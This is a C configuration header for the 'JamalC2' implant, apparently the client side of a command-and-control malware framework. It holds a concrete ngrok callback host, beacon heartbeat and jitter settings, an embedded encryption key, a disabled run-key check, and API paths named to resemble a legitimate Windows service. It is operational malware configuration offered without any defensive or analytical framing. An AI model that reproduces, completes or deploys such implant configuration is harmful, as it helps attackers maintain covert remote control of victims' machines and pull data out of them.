/*
 * JamalC2 Implant - Configuration Header
 * This file is auto-generated by the Builder
 */

#ifndef CONFIG_H
#define CONFIG_H

// Server Configuration
#define SERVER_HOST "109611f671d8.ngrok-free.app"
#define SERVER_PORT 443
#define USE_TLS 1

// Client Configuration
#define TAG "default"
#define VERSION "1.0.0"

// Beacon Configuration
#define HEARTBEAT_INTERVAL 30 // seconds
#define RECONNECT_DELAY 5     // seconds
#define JITTER_PERCENT 20     // 0-100%

// Encryption Key (64 hex chars = 32 bytes)
#define ENCRYPTION_KEY                                                         \
  "ddc2774b87fdf3a75aa9f8d0199fbc5fac11c0f02508709d0e422380f95482a8"

// Run Key (for execution validation)
#define RUN_KEY "321"
#define SKIP_KEY_CHECK 1

// API Paths (all requests go to same endpoint, type is in encrypted payload)
#define API_CHECKIN "/api/CpHDCPSvc"
#define API_RESULT "/api/CpHDCPSvc"

#endif // CONFIG_H
